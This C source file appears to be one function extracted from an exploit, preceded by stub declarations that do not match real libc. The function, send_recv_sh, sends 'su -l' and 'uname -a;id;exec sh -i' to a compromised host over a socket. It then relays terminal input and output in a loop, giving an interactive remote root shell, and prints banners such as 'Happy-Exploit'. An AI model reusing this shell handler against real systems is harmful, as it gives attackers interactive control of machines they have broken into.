
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct timeval {int tv_sec; scalar_t__ tv_usec; } ;
typedef int rbuf ;
typedef int fd_set ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int STDIN_FILENO ;
 int close (int) ;
 int exit (int ) ;
 int fflush (int ) ;
 int fprintf (int ,char*,...) ;
 int memset (char*,int ,int) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,struct timeval*) ;
 int send (int,char*,int ,int ) ;
 int stdout ;
 int strlen (char*) ;
 int write (int,char*,int) ;

void send_recv_sh(int sock)
{
 int pk;
 struct timeval tm;
 char *t_cmd="su -l\n";
 char *n_cmd="uname -a;id;exec sh -i\n";
 char rbuf[1024];
 fd_set rset;
 memset((char *)rbuf,0,sizeof(rbuf));
 fprintf(stdout," [*] Executed shell successfully !\n");
 fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n");
 send(sock,t_cmd,strlen(t_cmd),0);
 send(sock,n_cmd,strlen(n_cmd),0);

 tm.tv_sec=10;
 tm.tv_usec=0;

 while(1)
 {
  fflush(stdout);
  FD_ZERO(&rset);
  FD_SET(sock,&rset);
  FD_SET(STDIN_FILENO,&rset);

  select(sock+1,&rset,((void*)0),((void*)0),&tm);

  if(FD_ISSET(sock,&rset))
  {
   pk=read(sock,rbuf,sizeof(rbuf)-1);
   if(pk<=0)
   {
    fprintf(stdout," [*] Happy-Exploit\n\n");
    close(sock);
    exit(0);
   }
   rbuf[pk]=0;
   fprintf(stdout,"%s",rbuf);
  }
  if(FD_ISSET(STDIN_FILENO,&rset))
  {
   pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
   if(pk>0)
   {
    rbuf[pk]=0;
    write(sock,rbuf,pk);
   }
  }
 }
 return;
}
